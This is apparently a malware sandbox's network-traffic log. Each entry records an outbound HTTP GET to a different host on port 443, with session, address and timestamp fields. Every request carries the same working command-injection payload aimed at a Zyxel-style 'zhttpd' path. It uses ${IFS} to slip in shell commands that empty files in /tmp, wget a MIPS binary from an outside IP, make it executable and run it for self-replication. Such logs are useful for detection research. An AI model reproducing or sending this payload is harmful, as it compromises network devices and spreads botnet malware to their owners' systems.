                                                        Jan 28, 2024 10:13:05.652622938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7647192.168.2.1452486109.204.242.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652662992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7648192.168.2.1442910158.242.5.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652717113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7649192.168.2.1439282166.206.195.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652770042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7650192.168.2.1449798114.204.31.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652797937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7651192.168.2.143716272.119.4.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652852058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7652192.168.2.144049280.230.16.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652889013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7653192.168.2.1449894211.155.158.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652921915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7654192.168.2.144793667.130.211.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652957916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7655192.168.2.1439272181.136.195.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652993917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7656192.168.2.144533659.70.201.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653053045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7657192.168.2.143404419.107.163.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653103113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7658192.168.2.143502877.137.230.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653140068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7659192.168.2.144454462.146.81.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653165102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7660192.168.2.1452790212.112.49.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653214931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7661192.168.2.1438446219.91.189.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653249025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7662192.168.2.145398871.113.59.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653276920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7663192.168.2.1433494102.179.227.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653309107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7664192.168.2.1441216136.204.166.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653356075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7665192.168.2.145856024.37.226.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653429985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7666192.168.2.1445978148.42.8.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653465033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7667192.168.2.14476224.202.244.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653516054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7668192.168.2.14425265.148.86.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653542042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7669192.168.2.14374301.37.39.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653577089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7670192.168.2.145430459.218.149.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653615952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7671192.168.2.1447316191.147.127.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653660059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7672192.168.2.14577962.143.153.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653695107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7673192.168.2.1435654104.56.54.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653737068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7674192.168.2.145358899.12.154.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653789997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7675192.168.2.1433982205.69.134.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653831959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7676192.168.2.1434750158.143.81.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653871059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7677192.168.2.145085653.179.78.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653918028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7678192.168.2.143639441.110.178.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653966904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7679192.168.2.1456610217.163.192.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.653999090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7680192.168.2.1438498115.68.186.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654042006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7681192.168.2.1455582170.74.5.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654076099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7682192.168.2.1452112173.123.88.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654123068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7683192.168.2.1433138188.221.197.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654153109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7684192.168.2.1447128156.32.226.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654217005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7685192.168.2.143346046.7.187.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654232025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7686192.168.2.1436450132.205.3.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654268026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7687192.168.2.143786272.191.98.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654283047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7688192.168.2.1460768108.71.211.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654339075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7689192.168.2.144573643.0.162.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654364109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7690192.168.2.143282632.105.100.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654422045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7691192.168.2.1443868138.69.240.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654457092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7692192.168.2.143664614.252.56.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654489994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7693192.168.2.1458496180.235.29.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654534101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7694192.168.2.145769078.98.22.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654565096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7695192.168.2.1453486120.13.21.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654591084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7696192.168.2.1439058153.253.68.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654604912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7697192.168.2.144348093.199.205.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654637098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7698192.168.2.145547478.116.198.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654683113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7699192.168.2.144930688.159.92.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654716969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7700192.168.2.1450416167.110.140.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654747009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7701192.168.2.144518646.151.242.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654787064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7702192.168.2.1439568105.177.79.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654840946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7703192.168.2.143547624.57.208.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654886007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7704192.168.2.143349296.179.135.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654910088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7705192.168.2.144204293.141.113.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654962063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7706192.168.2.1457118204.241.50.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.654993057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7707192.168.2.1456750157.127.39.128443
                                                        TimestampBytes transferredDirectionData
